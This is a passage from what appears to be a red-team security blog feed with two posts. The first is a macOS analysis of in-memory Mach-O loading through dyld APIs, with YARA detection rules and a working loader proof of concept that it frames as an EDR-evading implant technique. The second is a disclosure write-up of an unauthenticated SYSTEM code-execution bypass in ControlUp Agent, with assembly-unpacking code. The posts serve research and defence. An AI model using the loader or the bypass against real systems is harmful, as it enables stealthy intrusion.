<p>I wrote up a YARA signature which is fairly successful at detecting this behavior. This signature looks for byte patterns that match <code class="language-plaintext highlighter-rouge">LC_MAIN</code>, and invocations of <code class="language-plaintext highlighter-rouge">NsLinkModule</code> and <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> in a binary. Here, sig_for_mach_o refers to the YARA signature similar to <a href="https://github.com/airbnb/binaryalert/blob/master/rules/public/MachO.yara">this</a>.</p>

<pre><code class="language-Yara">rule memory_loading_and_execution: in_memory_loader{
  meta:
    author = "r34p3r@meta.com"
    share_level = "GREEN"
    description = "Possible in-memory loading and execution of Mach-O Seen in OSX/Evilquest"
  strings:
    $bad_LC_MAIN_jmp = {
      81 ?? 28 00 00 80
      0F 8? ?? ?? ?? ??
    }
    $map_args_to_nslinkmodule = {
        48 ?? (?? ?? | ?? ?? ?? ?? ??)
        48 ?? (?? ?? | ?? ?? ?? ?? ??)
        [0-32]
        BA 03 00 00 00
        [0-32]
        (ff | E8) ?? ?? ?? ??
    }
    $map_args_to_nscreate = {
        48 ?? ?? ?? ?? 00 00
        48 ?? ??
        48 ?? ?? ?? ?? 00 00
        B? (?? | ?? ?? ?? ??)
        [0-32]
        E8 ?? ?? 00 00
    }

  condition:
    {sig_for_mach_o} and $map_args_to_nslinkmodule and $bad_LC_MAIN_jmp and $map_args_to_nscreate
}
</code></pre>

<h2 id="nscreateobjectfileimagefromfile">NSCreateObjectFileImageFromFile</h2>

<p>While going through the dyld APIs, I noticed that there was another API, <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code>, which had a similar function signature to <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code>. This API is a sibling of <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code>, and is able to work with any file on disk.</p>

<h3 id="why-use-nscreateobjectfileimagefromfile">Why use NSCreateObjectFileImageFromFile?</h3>

<p>Let’s abstract out the requirement of a good loader for a second and look at it from a high level. In a good loader:</p>

<ul>
  <li>We want to leave no footprint on disk, except perhaps the loader.</li>
  <li>We want to execute things in a way that avoids detection.</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> mentioned in this note could have been used to execute arbitrary downloaded files in-memory. But do we really need arbitrary executables when the operating system has a lot of <em>Apple signed lolbins?</em></p>

<p>This API allows you to load any arbitrary Mach-O from disk, and could form an integral piece of an implant.</p>

<h3 id="internals">Internals</h3>

<pre><code class="language-C++">// macOS needs to support an old API that only works only
// with fileype==MH_BUNDLE.
NSObjectFileImageReturnCode NSCreateObjectFileImageFromFile(const char* path, NSObjectFileImage* ofi)
{
    log_apis("NSCreateObjectFileImageFromFile(\"%s\", %p)\n", path, ofi);

    // verify path exists
    struct stat statbuf;
    if ( dyld3::stat(path, &amp;statbuf) == -1 )
        return NSObjectFileImageFailure;

    // create ofi that just contains path. NSLinkModule does all the work
    OFIInfo result;
    result.path        = strdup(path);
    result.memSource   = nullptr;
    result.memLength   = 0;
    result.loadAddress = nullptr;
    result.imageNum    = 0;
    *ofi = gAllImages.addNSObjectFileImage(result);

    log_apis("NSCreateObjectFileImageFromFile() =&gt; %p\n", *ofi);

    return NSObjectFileImageSuccess;
}
</code></pre>

<p>This API is fairly straightforward. While Apple does warn that this API can only be used in bundles, it’s possible to iterate through a mapped image and find the offset for <code class="language-plaintext highlighter-rouge">LC_MAIN</code> such that we can call the main function of a mapped executable.</p>

<pre><code class="language-C++">int find_Mach-O(unsigned long addr, unsigned long *base, unsigned int increment, unsigned int dereference) {
    unsigned long ptr;
    // find a Mach-O header by searching from address
    *base = 0;

    while(1) {
        ptr = addr;
        if(dereference) ptr = *(unsigned long *)ptr;
        chmod((char *)ptr, 0777);
        if(errno == 2 /*ENOENT*/ &amp;&amp;
            ((int *)ptr)[0] == 0xfeedfacf /*MH_MAGIC_64*/) {
            *base = ptr;
            return 0;
        }

        addr += increment;
    }
    return 1;
}


int find_epc(unsigned long base, struct entry_point_command **entry) {
    // find the entry point command by searching through base's load commands

    struct mach_header_64 *mh;
    struct load_command *lc;

    *entry = NULL;

    mh = (struct mach_header_64 *)base;
    lc = (struct load_command *)(base + sizeof(struct mach_header_64));
    for(int i=0; i&lt;mh-&gt;ncmds; i++) {
        if(lc-&gt;cmd == LC_MAIN) {    //0x80000028
            *entry = (struct entry_point_command *)lc;
            return 0;
        }

        lc = (struct load_command *)((unsigned long)lc + lc-&gt;cmdsize);
    }

    return 1;
}
</code></pre>

<p>Hence, this API can be used to load both bundles and Mach-O executables.</p>

<h3 id="attacker-hat-on-1">Attacker Hat on</h3>

<p>From an attacker standpoint, it’s possible to create a backdoor of sorts which takes a Mach-O that exists locally, and execute it without using the “exec” syscall. The execution hence becomes invisible to most EDRs. The following sequence of API calls is how you can accomplish it:</p>

<pre><code class="language-ObjC">dyldErr = NSCreateObjectFileImageFromFile(
    codePath,
    &amp;ofi
);
module = NSLinkModule(ofi, moduleName, options);
symbol = NSLookupSymbolInModule(module, "_" kBundleEntryPointName);
function = NSAddressOfSymbol(symbol);
function(message);
</code></pre>

<p>It provides all the benefits that <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> used to provide but does not leave file artifacts on disk. It also avoids use of <code class="language-plaintext highlighter-rouge">exec</code>. It is an ideal API to use in an executable loader implant on macOS.</p>

<h3 id="defender-hat-on-1">Defender Hat on</h3>

<p>The problems to detect this mirror the problems to detect <code class="language-plaintext highlighter-rouge">NSCreateObjectFileFromMemory</code> exactly. A YARA signature could be our best bet at detecting this API inside a Mach-O loader:</p>

<pre><code class="language-Yara">rule memory_loading_and_execution_using_fileimagefromfile: mac_os in_memory_loader_using_fileimagefromfile{
  meta:
    author = "r34p3r@meta.com"
    share_level = "GREEN"
    description = "Possible in-memory loading and execution of Mach-O"

  strings:
    $call_to_LC_MAIN_jmp = {
      81 ?? 28 00 00 80
      0F 8? ?? ?? ?? ??
    }
    $ns_link_module = "NSLinkModule"
    $ns_create_image_from_file = "NSCreateObjectFileImageFromFile"
    $call_to_nslookup_for_symbols = "NSLookupSymbolInModule"
    $call_to_ns_address_of_symbol = "NSAddressOfSymbol"
    $map_args_to_nslinkmodule = {
        48 ?? ?? ?? ?? ff ff
        4C ?? ??
        [0-32]
        BA (03| 07) 00 00 00
        [0-32]
        E8 ?? ?? ?? ??
    }
  condition:
    {sig_for_mach_o} and $ns_create_image_from_file and ($ns_link_module and $map_args_to_nslinkmodule) and 2 of ($call_to_*)
}
</code></pre>

<p>This YARA signature looks for signatures of <code class="language-plaintext highlighter-rouge">LC_MAIN</code>, and invocation signatures of <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code>, <code class="language-plaintext highlighter-rouge">NSLinkModule</code>, <code class="language-plaintext highlighter-rouge">NSLookupSymbolInModule</code> and <code class="language-plaintext highlighter-rouge">NSLookupSymbolInModule</code> to detect if this method of invocation is being used in an executable.</p>

<h2 id="cfbundlecreate">CFBundleCreate</h2>

<p>Apple’s documentation about the third API is a bit sparse.</p>

<p><img src="https://rtx.meta.security/assets/images/In_Memory_macOS/CFBundleCreate.png" alt="&quot;Apple's complete public documentation on CFBundleCreate&quot;" /></p>

<p>This API essentially mimics what <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code> does. The following sequence of API calls should result in desired behavior:</p>

<pre><code class="language-ObjC">url = CFURLCreateFromFileSystemRepresentation(NULL, (const UInt8 *) pathToBundle, strlen(pathToBundle), true);
bundle = CFBundleCreate(NULL, url);
func = (EntryPoint) CFBundleGetFunctionPointerForName(bundle, CFSTR(kBundleEntryPointName));
func("... from CFBundle");
</code></pre>

<h2 id="pre-requisite-entitlements">Pre-requisite Entitlements</h2>

<p>Apple has introduced memory protection primitives in the way memory permissions are handled. This means that a couple of entitlements are required to get in-memory execution working.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>manishbhatt@jvf-imac Development % codesign <span class="nt">-d</span> <span class="nt">--entitlements</span> - ./loader
<span class="o">[</span>Dict]
    <span class="o">[</span>Key] com.apple.security.cs.allow-unsigned-executable-memory
    <span class="o">[</span>Value]
        <span class="o">[</span>Bool] <span class="nb">true</span>
    <span class="o">[</span>Key] com.apple.security.cs.disable-executable-page-protection
    <span class="o">[</span>Value]
        <span class="o">[</span>Bool] <span class="nb">true</span>
    <span class="o">[</span>Key] com.apple.security.cs.disable-library-validation
    <span class="o">[</span>Value]
        <span class="o">[</span>Bool] <span class="nb">true</span>
</code></pre></div></div>

<p>These entitlements are not restricted. Anyone with a developer certificate can attach them to their application.</p>

<h2 id="putting-it-together-in-a-single-mach-o">Putting it together in a single Mach-O</h2>

<p>For the PoC we have 2 things: an innocuous looking bundle and a Mach-O executable which uses <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code> and <code class="language-plaintext highlighter-rouge">CFBundleCreate</code> to load the bundle directly from disk. The function <code class="language-plaintext highlighter-rouge">HelloWorld</code> from the bundle gets loaded by the Mach-O.</p>

<h3 id="bundle-source-code">Bundle Source Code</h3>

<pre><code class="language-ObjC">#include &lt;stdio.h&gt;

extern void HelloWorld(const char *message);

extern void HelloWorld(const char *message)
{
    fprintf(stderr, "Hello World!\n");
    fprintf(stderr, "%s\n", message);
}
</code></pre>

<h3 id="loader-that-loads-bundles-from-disk">Loader that Loads Bundles from Disk</h3>

<pre><code class="language-ObjC">#include &lt;CoreServices/CoreServices.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;mach/mach.h&gt;
#include &lt;mach-o/arch.h&gt;
#include &lt;mach-o/fat.h&gt;
#include &lt;mach-o/dyld.h&gt;

// Definitions for the bundle entry point.

#define kBundleEntryPointName "HelloWorld"
typedef void( * EntryPoint)(const char * message);

/////////////////////////////////////////////////////////////////

static void cf_load_bundle(const char * pathToBundle)
// Load and call the bundle the easy way, via CFBundle.
{
  CFURLRef u;
  CFBundleRef b;
  EntryPoint f;

  u = NULL;
  b = NULL;

  u = CFURLCreateFromFileSystemRepresentation(NULL, (const UInt8 * ) pathToBundle, strlen(pathToBundle), true);
  if (u == NULL) {
    fprintf(stderr, "Could not create URL.\n");
  } else {
    b = CFBundleCreate(NULL, u);
    if (b == NULL) {
      fprintf(stderr, "Could not create bundle.\n");
    } else {
      f = (EntryPoint) CFBundleGetFunctionPointerForName(b, CFSTR(kBundleEntryPointName));
      if (f == NULL) {
        fprintf(stderr, "Could not get entry point.\n");
      } else {
        f("... from CFBundle");
      }
    }
  }

  if (b != NULL) {
    CFRelease(b);
  }
  if (u != NULL) {
    CFRelease(u);
  }
}

static Boolean GetBundleExecutable(const char * pathToBundle, char * buf, size_t bufLen)
// Get the executable path for the specified bundle.  We do this using
// CFBundle APIs to avoid having to hard-code things like "Contents/macOS".
{
  Boolean ok;
  CFURLRef u;
  CFBundleRef b;
  CFURLRef u2;

  u = NULL;
  b = NULL;
  u2 = NULL;

  // Create a bundle from the path.

  ok = true;
  u = CFURLCreateFromFileSystemRepresentation(NULL, (const UInt8 * ) pathToBundle, strlen(pathToBundle), true);
  if (u == NULL) {
    ok = false;
  }
  if (ok) {
    b = CFBundleCreate(NULL, u);
    if (b == NULL) {
      ok = false;
    }
  }

  // Ask the bundle for the path to the executable.

  if (ok) {
    u2 = CFBundleCopyExecutableURL(b);
    if (u2 == NULL) {
      ok = false;
    }
  }
  if (ok) {
    ok = CFURLGetFileSystemRepresentation(u2, true, (UInt8 * ) buf, bufLen);
  }

  // Clean up.

  if (u != NULL) {
    CFRelease(u);
  }
  if (b != NULL) {
    CFRelease(b);
  }
  if (u2 != NULL) {
    CFRelease(u2);
  }
  return ok;
}

static void nsfromfile_load_bundle(const char * pathToBundle) {
  int junk;
  char codePath[1024];
  void * codeAddr;
  size_t codeSize;
  const char * moduleName;
  const char * message;
  NSObjectFileImageReturnCode dyldErr;
  NSObjectFileImage ofi;
  enum DYLD_BOOL ok;
  NSModule m;
  NSSymbol s;
  EntryPoint f;

  codeAddr = NULL;
  ofi = NULL;
  m = NULL;

  // Get the path to the code within the bundle.

  ok = GetBundleExecutable(pathToBundle, codePath, sizeof(codePath));
  if (!ok) {
    fprintf(stderr, "Could not locate executable with '%s'.", pathToBundle);
  } else {
    // Set moduleName for the call to NSLinkModule.

    moduleName = codePath;
    message = "... from NSCreateObjectFileImageFromFile";

    // Create the object file image directly from the file.

    dyldErr = NSCreateObjectFileImageFromFile(
      codePath, &amp;
      ofi
    );

    if (dyldErr != NSObjectFileImageSuccess) {
      fprintf(stderr, "Could not create object file image.\n");
    } else {
      unsigned long options;
      // NSLINKMODULE_OPTION_PRIVATE: Don't publish the bundle's exports to the global namespace
      // NSLINKMODULE_OPTION_RETURN_ON_ERROR : Return, rather than abort(), or error
      // NSLINKMODULE_OPTION_BINDNOW: Link the module now, rather than on demand
      options = NSLINKMODULE_OPTION_PRIVATE
        |
        NSLINKMODULE_OPTION_RETURN_ON_ERROR;
      #if!defined(NDEBUG)
      options |= NSLINKMODULE_OPTION_BINDNOW;
      #endif
      m = NSLinkModule(ofi, moduleName, options);

      if (m == NULL) {
        fprintf(stderr, "Could not link module.%s \n", m);
      } else {
        s = NSLookupSymbolInModule(m, "_"
          kBundleEntryPointName);
        if (s == NULL) {
          fprintf(stderr, "Could not lookup symbol.\n");
        } else {
          f = NSAddressOfSymbol(s);
          if (f == NULL) {
            fprintf(stderr, "Could not get address of symbol.\n");
          } else {
            f(message);
          }
        }
      }
    }
  }

  if (m != NULL) {
    ok = NSUnLinkModule(m, NSUNLINKMODULE_OPTION_NONE);
    assert(ok);
  }
  if (ofi != NULL) {
    ok = NSDestroyObjectFileImage(ofi);
    assert(ok);
    codeAddr = NULL;
  }
  if (codeAddr != NULL) {
    junk = (int) vm_deallocate(mach_task_self(), (vm_address_t) codeAddr, codeSize);
    assert(junk == 0);
  }
}

static void PrintUsage(void) {
  fprintf(stderr, "loader ( -cf | -ns | -nsmem ) PathToBundle\n");
}

int main(int argc,
  const char * argv[]) {
  if (argc != 3) {
    PrintUsage();
    exit(EXIT_FAILURE);
  }

  if (strcmp(argv[1], "-cf") == 0) {
    cf_load_bundle(argv[2]);
  } else if (strcmp(argv[1], "-ns") == 0) {
    nsfromfile_load_bundle(argv[2]);
  } else {
    PrintUsage();
    exit(EXIT_FAILURE);
  }

  return EXIT_SUCCESS;
}
</code></pre>

<p>The following screenshot demonstrates this loading behavior in action:</p>

<p><img src="https://rtx.meta.security/assets/images/In_Memory_macOS/hello.png" alt="&quot;Proof of the PoC loader executing&quot;" /></p>]]></content><author><name>Manish Bhatt, Red Team X</name></author><category term="post-exploitation" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Uncovering Hidden .NET Assemblies</title><link href="https://rtx.meta.security/reversing/2022/09/21/Uncovering_Hidden_NET_Assemblies.html" rel="alternate" type="text/html" title="Uncovering Hidden .NET Assemblies" /><published>2022-09-21T00:00:00+00:00</published><updated>2022-09-21T00:00:00+00:00</updated><id>https://rtx.meta.security/reversing/2022/09/21/Uncovering_Hidden_NET_Assemblies</id><content type="html" xml:base="https://rtx.meta.security/reversing/2022/09/21/Uncovering_Hidden_NET_Assemblies.html"><![CDATA[<p>We recently completed a security review of ControlUp Agent by ControlUp Technologies. The software is responsible for remote management and analytics of agent hosts on which it runs. The software is typically deployed in virtualization infrastructure environments. This writeup details the steps taken to assess the software, bypass obfuscation, and get remote unauthenticated code execution as NT AUTHORITY\SYSTEM on any host running the ControlUp Agent software (&lt; v8.2.5) so long as it’s reachable on the network.</p>

<p>We reported this issue to ControlUp on May 11, 2021. They acknowledged the report the next day, thanked us for our report, and informed us that the usage of static encryption keys had already been proactively fixed as of version 8.2.5. You can read the <a href="https://github.com/fbredteam/external-disclosures/security/advisories/GHSA-vmc4-wm3f-w3fr">original report we sent to ControlUp</a>. CVE-2021-45913 was assigned to track this vulnerability.</p>

<p>The ControlUp Agent (cuAgent) software is written in .NET. This is ideal for reverse engineering – .NET usually decompiles to nearly the same thing that the developer initially wrote. But we noticed something strange with the Smart-X ControlUp binaries. Firstly, there weren’t a lot of .NET assembly DLLs that came along with the project. That’s not strange by itself, but often .NET binaries come with a lot of extra DLLs. Looking in Process Explorer shows that there are many loaded assemblies – but we weren’t able to find them in DotPeek or on disk.</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/cuAgent_properties.png" alt="&quot;Process Explorer showing loaded Assemblies in cuAgent.exe&quot;" /></p>

<p>They also use some sort of obfuscation. Class, method, and variable names look like this:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/obfuscation.png" alt="&quot;Obfuscated .NET method&quot;" /></p>

<p>Not only do they have odd class, variable, and method names – they have a lot of dead code. Note that the case 0: on line 337 will never execute. It looks like obfuscation to slow down a reverser. Also a lot of “if (false)” statements are littered throughout the code.</p>

<p>Based on inspecting the running binary, we know that they’re creating WCF named pipes and TCP endpoints. But we couldn’t find any references in the code where this happens.</p>

<p>Reviewing more code, we stumbled across this:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/chararray.png" alt="&quot;Suspicious charArray&quot;" /></p>

<p>That seemed odd, so I spent a bit of time reversing what is going on. That charArray gets bitwise inverted. At that point, it is more readable:</p>

<pre><code class="language-.NET">AppLoadTimeTracer.AgentSideCommon, Version=1.0.0.0, Culture=neutral, \
PublicKeyToken=null`pkC3o4ibHqbaW9eT+sfYIA==`SmartX.Common, Version=1.0.0.0, \
Culture=neutral, PublicKeyToken=null`nZLN7WTbcAXIfmox4Owtnw==`...
</code></pre>

<p>After splitting on the backtick delimiter, we are left with a list of AssemblyInfo:base64 pairs. At this point, I exported the code that does the unpacking and copied it to a Visual Studio .NET project where I could rename variables and clean it up by removing those dead conditionals.</p>

<p>Reversing more of the code shows they’re getting the manifest resource stream based on the base64 name and passing it to a new function.</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/des.png" alt="&quot;Reversed code showing DES being used&quot;" /></p>

<p>In this next function, they read and ignore the first 3 bytes of the stream. They read the 4th byte as a flag byte. The decoded bits of the flag are:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0: unknown
1: Encrypted assembly
2: unknown
3: Compressed assembly
4-7: unknown
</code></pre></div></div>

<p>An assembly resource file can be a raw assembly, encrypted, compressed, or encrypted and compressed. If it’s compressed, they simply call DeflateStream on it. If it’s encrypted, they use DESCryptoServiceProvider. But where are the key and IV?</p>

<p>In the encrypted case, the next 8 bytes in the resource stream are the IV and the following 8 bytes are the key:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/desdecrypt.png" alt="&quot;Reversed code showing DES decryption function and where key + IV are found&quot;" /></p>

<p>So we now have everything we need to retrieve all the assemblies from the executables and write them to files. Once we write them to a file, we can load them in DotPeek and keep working:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/dotpeek.png" alt="&quot;DotPeek showing decrypted assemblies&quot;" /></p>

<p>In the end, we were able to recover 156 additional assemblies across 3 obfuscated service binaries. We ended up finding the named pipe and TCP WCF handlers, as well.</p>

<p>Once we recovered the inner assemblies, we found some other oddities. They store some encrypted RSA private keys in the ControlUp Monitor’s obfuscated resource files. One of the keys is used in the authentication between the ControlUp Monitor and the ControlUp Agent. Getting this encrypted RSA key was actually the reason to start digging so deeply into the second-level .NET Assembly packing. The RSA private key is encrypted, but it uses the same hard-coded 3DES key used in many ControlUp methods. The 3DES key doesn’t provide strong confidentiality since it’s easily found in all of the executable’s resources.</p>

<p>This RSA private key is used to decrypt the session key/IV returned from the PrepareConnection call. The session key/IV is used to 3DES encrypt the UserTokens that are then decrypted on the server. This is the root of the authentication bypass - if an unauthenticated user knows this 3DES key/IV, they can encrypt a UserTokens of valid@junk;$SID (where “junk” is ignored, “valid” is what they use to determine if the connection is valid, and $SID is the SID of an account in the Administrators group). That’s it! No password, kerberos ticket – nothing else is required.</p>

<p>The end result is unauthenticated remote code execution as <code class="language-plaintext highlighter-rouge">NT AUTHORITY\SYSTEM</code>. This affects all users of the ControlUp Agent software with version &lt; 8.2.5.</p>

<p>Running the PoC shows that we can connect to a socket, send it some packets, and get it to execute code for us as <code class="language-plaintext highlighter-rouge">NT AUTHORITY\SYSTEM</code>:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/poc.png" alt="&quot;PoC works, showing execution as SYSTEM&quot;" /></p>

<p>More detail, including the PoC, can be found in <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-vmc4-wm3f-w3fr">our advisory</a>. The code that I used to do the de-obfuscation is included here:</p>

<pre><code class="language-.NET">using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Security.Cryptography;

namespace StringArrayReverser
{
    class Program
    {

        static string[] DecodeString(char[] input)
        {
            for (int index = 0; index &lt; input.Length; ++index)
                input[index] = (char)~(ushort)input[index];
            string[] strArray = new string(input).Split('`');
            return strArray;
        }

        static void FalconReverser()
        {
            char[] charArray = "ﾾﾏﾏﾳﾐﾞﾛﾫﾖﾒﾚﾫﾍ&lt;SNIP&gt;ﾼﾑﾖￆﾞﾝￔﾶﾵￔﾈￂￂ".ToCharArray();
            var strArray = DecodeString(charArray);

            UnpackAssemblies("AppLoadTimeTracer.exe", strArray);
        }

        static byte[] DESDecrypt(Stream InStream)
        {
            MemoryStream memoryStream = new MemoryStream();
            Stream stream = InStream;

            for (int index = 1; index &lt; 4; ++index)
            {
                InStream.ReadByte();
            }
            ushort Flags = (ushort)~InStream.ReadByte();
            // Skip 3 bytes, read 4th byte

            // Encrypted
            if (((int)Flags &amp; 2) != 0)
            {
                DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
                byte[] DESIV = new byte[8];
                InStream.Read(DESIV, 0, 8);
                cryptoServiceProvider.IV = DESIV;
                byte[] DESKey = new byte[8];
                InStream.Read(DESKey, 0, 8);

                cryptoServiceProvider.Key = DESKey;

                memoryStream.Position = 0L;
                ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor();
                int inputBlockSize = decryptor.InputBlockSize;
                int outputBlockSize = decryptor.OutputBlockSize;
                byte[] numArray1 = new byte[decryptor.OutputBlockSize];
                byte[] numArray2 = new byte[decryptor.InputBlockSize];
                int position;
                for (position = (int)InStream.Position; (long)(position + inputBlockSize) &lt; InStream.Length; position += inputBlockSize)
                {
                    InStream.Read(numArray2, 0, inputBlockSize);
                    int count = decryptor.TransformBlock(numArray2, 0, inputBlockSize, numArray1, 0);
                    memoryStream.Write(numArray1, 0, count);
                }

                InStream.Read(numArray2, 0, (int)(InStream.Length - (long)position));
                byte[] buffer3 = decryptor.TransformFinalBlock(numArray2, 0, (int)(InStream.Length - (long)position));
                memoryStream.Write(buffer3, 0, buffer3.Length);
                stream = (Stream)memoryStream;
                stream.Position = 0L;
            }
            if (((int)Flags &amp; 8) != 0)
            {
                var tmpStream = new MemoryStream();
                DeflateStream deflateStream = new DeflateStream(stream, CompressionMode.Decompress);
                deflateStream.CopyTo(tmpStream);

                memoryStream = tmpStream;
            }

            if (Flags == 0xff00)
            {
                memoryStream.SetLength(0);
                stream.CopyTo(memoryStream);
            }

            return memoryStream.ToArray();
        }

        static void UnpackAssemblies(string parent, string[] strArray)
        {
            int i;

            Assembly ass = Assembly.LoadFrom(parent);

            Console.WriteLine("Loaded {0}", ass.FullName);
            var dirname = "output\\" + parent + "\\";
            Directory.CreateDirectory("output");
            Directory.CreateDirectory(dirname);
            for (i = 0; i &lt; strArray.Length; i += 2)
            {
                var info = strArray[i];
                var b64 = strArray[i + 1];

                var name = info.Split(',')[0];

                Console.WriteLine("{0} {1} {2}", name, b64, info);
                var mrs = ass.GetManifestResourceStream(b64);
                var decryptedBytes = DESDecrypt(mrs);
                if (b64.EndsWith("#"))
                {
                    File.WriteAllBytes(dirname + "\\" + name + ".pdb", decryptedBytes);
                }
                else
                {
                    File.WriteAllBytes(dirname + "\\" + name + ".dll", decryptedBytes);
                }
            }
        }

        static void cuAgentReverser()
        {
            /* Note: This needs to be fixed to include the array from the binary. */
            char[] charArray = "ﾬﾒﾞﾍﾋﾧ\x&lt;SNIP&gt;\xFFC9ﾪﾚﾛﾮￂￂ".ToCharArray();
            var strArray = DecodeString(charArray);

            UnpackAssemblies("cuAgent.exe", strArray);

        }

        static void ConsoleReverser()
        {
            char[] charArray = "ﾾﾜﾋﾖﾐﾑﾺﾉ&lt;SNIP&gt;ﾏﾮￊￌﾙﾘￂￂ".ToCharArray();
            var strArray = DecodeString(charArray);

            UnpackAssemblies("ControlUpConsole.exe", strArray);
        }

        static void Main(string[] args)
        {

            FalconReverser();

            cuAgentReverser();

            ConsoleReverser();
        }
    }
}
</code></pre>]]></content><author><name>Michael Henry, Red Team X</name></author><category term="reversing" /><summary type="html"><![CDATA[]]></summary></entry></feed>